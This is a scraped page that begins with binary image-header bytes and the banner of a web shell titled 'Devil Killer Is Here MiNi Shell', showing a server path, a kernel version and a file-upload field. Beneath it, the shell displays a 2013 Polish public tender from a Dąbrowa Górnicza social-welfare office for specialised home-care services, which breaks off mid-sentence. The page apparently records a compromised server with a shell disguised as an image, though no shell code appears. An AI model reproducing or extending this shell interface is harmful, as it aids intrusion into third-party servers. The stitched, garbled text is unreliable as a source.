JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131113/461396-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza.</b><br>
<b>Numer ogłoszenia: 461396 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza. ZP-6-60U-MOPS-2013. Ww. usługi  są świadczone zgodnie z art.17. 1 pkt 11, art.18.1pkt 3, art. 50. 1,art. 50.2 art. 50.4 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2013 r., poz. 182 z późn. zm.) oraz Rozporządzenia Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598  ze zmianą z dnia 6 lipiec 2006 r., Nr 134, poz. 943). III.1 Specjalistyczne usługi opiekuńcze są to usługi dostosowane do szczególnych potrzeb życiowych  osób, wynikających z rodzaju ich schorzenia lub niepełnosprawności, świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym. III.1.1 Do zadań Wykonawcy w zakresie specjalistycznych usług opiekuńczych w szczególności należy: 1. Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego  życia, w tym zwłaszcza: a) kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności  społecznego funkcjonowania, motywowanie  do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi  i umiejętności społecznych oraz wspieranie, także w formie asystowania  w codziennych czynnościach życiowych takich, jak: -samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu, -dbałość o higienę i wygląd, -utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną, -wspólne organizowanie i spędzanie czasu wolnego, -korzystanie z usług różnych instytucji, b) interwencje i pomoc w życiu w rodzinie , w tym: -pomoc w radzeniu sobie w sytuacjach kryzysowych-poradnictwo  specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne, -ułatwienie dostępu do edukacji i kultury, -doradztwo, koordynacja działań  innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług, -kształtowanie pozytywnych relacji  osoby wspieranej  z osobami bliskimi, -współpraca z rodziną-kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej, c) pomoc w załatwianiu  spraw urzędowych, w tym: -w uzyskiwaniu świadczeń socjalnych, emerytalno-rentowych, -w wypełnianiu dokumentów urzędowych, d) wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza: -w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego zajęcia, w szczególności uczestnictwo w zajęciach warsztatów terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy, -w kompletowaniu dokumentów potrzebnych do zatrudnienia, -w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, -w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku, e) pomoc w gospodarowaniu pieniędzmi, w tym: -nauka planowania budżetu, asystowaniu przy  ponoszeniu wydatków, -pomoc w uzyskaniu ulg w opłatach, -zwiększanie umiejętności gospodarowania własnym budżetem  oraz  usamodzielnienie finansowe, 2. Pielęgnacja- jako wspieranie procesu  leczenia, w tym: a) pomoc w dostępie do świadczeń zdrowotnych, b) uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych, c) pomoc w wykupywaniu lub zamawianiu leków w aptece, d) pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania, e) w szczególnie uzasadnionych przypadkach  zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny, f) pomoc  w dotarciu do  placówek służby zdrowia, g) pomoc w dotarciu do placówek rehabilitacyjnych, 3.Rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu  w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. z 2008 r., Nr 164, poz. 1027 z późn. zm.).a)  zgodnie  z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii, b) współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno - terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług, 4. Pomoc mieszkaniowa, w tym: a) w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat, b) organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych, c)kształtowanie właściwych relacji  osoby uzyskującej pomoc z sąsiadami i gospodarzem domu, III.2.Specjalistyczne usługi opiekuńcze dla osób z zaburzeniami  psychicznymi organizowane i świadczone są zgodnie z art. 18.1 pkt 3, art.50.4 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2013 r., poz. 182 z późn. zm.) oraz Rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r.  Nr 189 poz. 1598 ze zmianą z dnia 06.07.2006r. Dz. U. Nr 134, poz. 943). III.2.1 Do zadań Wykonawcy w zakresie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi dostosowanych do szczególnych potrzeb osób wymagających pomocy w formie specjalistycznych usług, wynikających z rodzaju ich schorzenia lub niepełnosprawności, świadczonych przez osoby ze specjalistycznym przygotowaniem zawodowym w szczególności należy:
1. Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza: a) kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych takich, jak: -samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu, -dbałość o higienę i wygląd, -utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością  lokalną, -wspólne organizowanie i spędzanie czasu wolnego, -korzystanie z usług różnych instytucji, b) interwencje i pomoc w życiu w rodzinie, w tym: -pomoc w radzeniu sobie w sytuacjach kryzysowych-poradnictwo specjalistyczne, interwencje kryzysowe,  wsparcie psychologiczne, rozmowy terapeutyczne,
-ułatwienie dostępu do edukacji i kultury, -doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie  specjalistycznych usług, -kształtowanie pozytywnych relacji osoby wspieranej  z osobami bliskimi, -współpraca z rodziną-kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej, c) pomoc w załatwianiu  spraw urzędowych, w tym: -w uzyskiwaniu świadczeń  socjalnych, emerytalno-rentowych, -w wypełnianiu dokumentów urzędowych, d) wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza: -w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego zajęcia, w szczególności uczestnictwo w zajęciach warsztatów  terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy, -w kompletowaniu dokumentów potrzebnych do  zatrudnienia, -w przygotowaniu do  rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, -w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku, e) pomoc w gospodarowaniu  pieniędzmi, w tym: -nauka planowania budżetu, asystowanie przy  ponoszeniu wydatków, -pomoc w uzyskaniu ulg w opłatach, -zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe, 2. Pielęgnacja - jako wspieranie procesu leczenia, w tym: a) pomoc w dostępie do świadczeń zdrowotnych, b) uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych, c) pomoc w wykupywaniu lub zamawianiu leków w aptece, d) pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania, e) w szczególnie uzasadnionych przypadkach  zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów  medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny, f) pomoc w dotarciu do  placówek służby zdrowia, g) pomoc w dotarciu do placówek rehabilitacyjnych, 3. Rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu  w zakresie nieobjętym przepisami  ustawy z dnia 27 sierpnia 2004 r. o  oświadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. z 2008 r. Nr 164, poz. 1027 z późn. zm.): a) zgodnie z zaleceniami lekarskimi  lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii, b) współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług, 4. Pomoc mieszkaniowa, w tym: a) w uzyskaniu mieszkania, negocjowaniu wnoszeniu opłat, b) w organizacji  drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych, c) kształtowanie właściwych relacji  osoby uzyskującej pomoc z sąsiadami i gospodarzem domu, 5. Zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych i rewalidacyjno-wychowawczych, w wyjątkowych przypadkach, jeżeli nie mają możliwości uzyskania dostępu do zajęć określonych w ustawie z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego (Dz. U. Nr 111 poz. 535 z późn. zm.) III.3 Przewidywana maksymalna ilość godzin miesięcznie dla specjalistycznych usług opiekuńczych wynosi: -maksymalnie-1583 godzin zegarowych w skali miesiąca,
- minimalnie 1000 godzin zegarowych w skali miesiąca. W skali zamówienia (12 miesięcy): -maksymalnie-18996 godzin zegarowych III.4Przewidywana ilość godzin miesięcznie dla  specjalistycznych usług dla osób z zaburzeniami psychicznymi wynosi: -maksymalnie w skali miesiąca-808 godzin zegarowych, -minimalnie w skali miesiąca-500 godzin zegarowych. W skali zamówienia (12 miesięcy): -maksymalnie-9696 godzin zegarowych III.5  Nie wykorzystana ilość godzin w danym miesiącu może być przez Zamawiającego przesunięta do wykorzystania w kolejnych miesiącach, na wyraźne zlecenie Zamawiającego. III.6 Zamawiający zastrzega  sobie prawo  zmiany ilości godzin przedmiotu zamówienia w zależności od wysokości posiadanych środków w roku  budżetowym 2014 oraz w zależności od potrzeb wynikających ze zmiennej ilości osób kwalifikujących się  do danego rodzaju usług.
III.7 Jeżeli wystąpi konieczność realizowania większej ilości godzin w skali miesiąca, niż określona w rozdziale III.3 i III.4, Zamawiający może zwiększyć ilość świadczenia usług w ramach maksymalnej wartości zamówienia określonej w umowie. III.8 Specjalistyczne usługi opiekuńcze oraz specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi mogą być świadczone w dni robocze, w dni świąteczne i wolne od pracy w miejscu zamieszkania lub czasowego pobytu osoby, której przyznano pomoc w zakresie specjalistycznych usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi. III.9.Do świadczenia specjalistycznych usług opiekuńczych Wykonawca zobowiązany jest zatrudnić osoby sprawne fizycznie i intelektualnie, zdolne do wykonywania prac fizycznych, posiadające umiejętność utrzymywania kontaktów interpersonalnych. III.10 Zlecenie realizacji specjalistycznych usług opiekuńczych lub  specjalistycznych usług dla osób z zaburzeniami psychicznymi na rzecz konkretnej osoby będzie przekazywane Wykonawcy na piśmie. Wykonawca otrzyma od pracownika Miejskiego Ośrodka Pomocy Społecznej kopię decyzji administracyjnej, zgodnie z którą obejmie klienta  usługą w czasookresach i wymiarze godzin określonych w decyzji administracyjnej. III.11 Dopuszcza się maksymalnie jedną zmianę osoby świadczącej usługi w okresie obowiązywania decyzji przyznającej świadczenie. W sytuacjach szczególnie uzasadnionych sytuacją klienta  lub Wykonawcy możliwa jest częstsza zmiana osoby świadczącej usługi  po wcześniejszym  uzgodnieniu z Zamawiającym. III.12 Za datę rozpoczęcia świadczenia specjalistycznych usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi na rzecz klientów uważa się datę określoną w decyzji administracyjnej. III.13 W szczególnych okolicznościach (np. powrót klienta ze szpitala, nagłe pogorszenie stanu zdrowia) dopuszcza się możliwość rozpoczęcia świadczenia usług przed wydaniem decyzji administracyjnej na wniosek  Zamawiającego tj. zgłoszenie ustne, telefoniczne lub faksem. Decyzja w takim przypadku zostanie przekazana Wykonawcy niezwłocznie. III.14 W wyjątkowych sytuacjach np. nagłe pogorszenie stanu zdrowia dopuszcza się możliwość ustnego, telefonicznego lub faksem zgłoszenia zmiany ilości godzin świadczonych specjalistycznych usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi określonych w decyzji administracyjnej, co następnie zostanie potwierdzona nową decyzją administracyjną dostarczoną niezwłocznie Wykonawcy. III.15 Wykonawca zobowiązany jest objąć klienta usługą niezwłocznie , jednak nie później niż w terminie 12 godzin od chwili zgłoszenia przez Zamawiającego.
III.16. Za datę zakończenia świadczenia usług na rzecz klienta uważa się datę określoną w decyzji administracyjnej. III.17 Opłata za specjalistyczne usługi opiekuńcze oraz za specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi  jest wnoszona przez osobę uzyskującą pomoc w formie specjalistycznej usługi opiekuńczej lub jej opiekuna, bezpośrednio do kasy MOPS lub przelewem na konto w terminie do 15 dnia każdego miesiąca następującego po miesiącu, w którym wykonano usługę. (Rozporządzenie Ministra Polityki Społecznej  w sprawie specjalistycznych usług opiekuńczych Dz. U. z 2005 r. Nr 189 poz. 1598 z późn. zm. oraz  Dz. U. z 2006 r., Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych). W przypadku wnoszenia opłaty przelewem: Nr rachunku MOPS 61156010102148123691770002   III.18.Dopuszcza się, że odpłatność za świadczone usługi od klienta będzie dokonywał Wykonawca indywidualnie od każdego klienta na rzecz MOPS na podstawie otrzymanego upoważnienia wystawionego przez klienta, który ma przyznane usługi w drodze decyzji administracyjnej. Kopię wpłaty Wykonawca dostarczy niezwłocznie klientowi. III.19. Wykonawca zobowiązuje się współpracować z pracownikami socjalnymi oraz innymi upoważnionymi pracownikami MOPS. Przez współpracę rozumie się wymianę informacji dotyczącą  osób i rodzin objętych pomocą Ośrodka w formie specjalistycznych usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi. III.20 Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte niniejszym zamówieniem  oraz prawidłowość wykonywanych  przez nie czynności i obowiązków  w zakresie opisanym w niniejszej SIWZ. III.21 Wykonawca wskaże Zamawiającemu numery telefonów kontaktowych i numer faksu Wykonawcy, inne informacje oraz ustalenia niezbędne dla sprawnego i terminowego wykonania zamówienia. III.22 Wykonawca ponosi odpowiedzialność za szkody wyrządzone przez Wykonawcę, w tym przez osoby, przy pomocy których Wykonawca realizuje zamówienie-osobom korzystającym ze specjalistycznych usług opiekuńczych i specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi. III.23 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę w trakcie wykonywania zamówienia. III.24 Wydatki związane z zakupami na rzecz klienta (np. zakup art. spożywczych, środków czystości itp.) ponoszone są ze środków klienta..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.31.21.00-8, 85.00.00.00-9, 85.31.11.00-3, 85.31.12.00-4, 85.31.13.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia o spełnieniu wymagań określonych w art.22 ust.1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku posiadania wiedzy i doświadczenia w zakresie realizacji przedmiotu zamówienia, jeżeli Wykonawca wykaże, wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych  usług, w okresie ostatnich trzech lat  przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów , na rzecz których  usługi te  zostały wykonane, oraz  załączeniem dowodów, czy zostały wykonane  lub są wykonywane należycie, tj. wykaże, że wykonał należycie co najmniej jedno zamówienie świadczenia w miejscu zamieszkania lub pobytu specjalistycznych usług opiekuńczych w ilości nie mniejszej niż 15000 godzin maksymalnie w skali 12 miesięcy  i wykonał należycie co najmniej jedno zamówienie świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w ilości nie mniejszej niż  7000 godzin maksymalnie w skali 12 miesięcy oraz załączy dowody potwierdzające, że świadczone w miejscu zamieszkania specjalistyczne usługi opiekuńcze oraz   specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi zostały wykonane lub są wykonywane należycie z uwzględnieniem zapisu rozdz.VII.1.2. SIWZ
Weryfikacja zostanie przeprowadzona wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia o spełnieniu wymagań określonych w art.22 ust.1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje  osobami, zdolnymi do realizacji zamówienia zgodnie z wymaganiami określonymi  Rozporządzeniem Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r. Nr 189 poz. 1598 z późn. zm. oraz Dz. U. ze zmianą z dnia 6 lipiec 2006 r., Nr 134, poz. 943 zmieniające rozporządzenie w sprawie specjalistycznych usług opiekuńczych) z uwzględnieniem rozdz. VII.1.3. SIWZ a) Do świadczenia specjalistycznych usług opiekuńczych wymagane jest co najmniej 14 osób posiadających kwalifikacje określone wymaganiami Rozporządzenia Ministra Polityki Społecznej w sprawie specjalistycznych usług opiekuńczych z dnia 22.09.2005 r. (Dz. U. z 2005r. Nr 189 poz. 1598 z późn. zm. oraz Dz. U. ze zmianą z dnia 6 lipiec 2006 r., Nr 134, poz. 943 zmieniającą rozporządzenie w sprawie specjalistycznych usług opiekuńczych), tj. wszystkie osoby przedstawione w wykazie posiadają co najmniej kwalifikacje do wykonania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi. b) Do świadczenia specjalistycznych usług dla osób z zaburzeniami psychicznymi wymagane jest co najmniej 10 osób posiadających kwalifikacje określone wymaganiami Rozporządzenia Ministra Polityki Społecznej (Dz. U. z 2005 r. Nr 189 poz. 1598 z późn. zm. oraz z dnia 6 lipca Dz. U. z 2006 r., Nr 134, poz. 943 zmieniającą rozporządzenie w sprawie specjalistycznych usług opiekuńczych), tj. wszystkie osoby przedstawione w wykazie posiadają co najmniej następujące kwalifikacje: 1) Osoby świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi muszą posiadać kwalifikacje do wykonania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi. 2) Osoby świadczące  specjalistyczne usługi dla osób z zaburzeniami psychicznymi muszą posiadać  co najmniej  półroczny staż pracy w jednej z następujących jednostek: 1) szpitalu psychiatrycznym, 2) jednostce organizacyjnej pomocy społecznej dla osób  z zaburzeniami psychicznymi, 3) placówce terapii lub placówce oświatowej, do której  uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym, 4) ośrodku terapeutyczno-edukacyjno-wychowawczym, 5) zakładzie rehabilitacji, 6) innej jednostce niż wymienione w pkt 1-5, świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi. 3) muszą posiadać przeszkolenie i doświadczenie w zakresie: -umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, -kształtowania nawyków celowej aktywności, -prowadzenia treningu zachowań społecznych. 4) W uzasadnionych przypadkach specjalistyczne usługi mogą być świadczone przez osoby, -które zdobywają lub podnoszą wymagane kwalifikacje zawodowe: pracownika socjalnego, psychologa, pedagoga, logopedy, 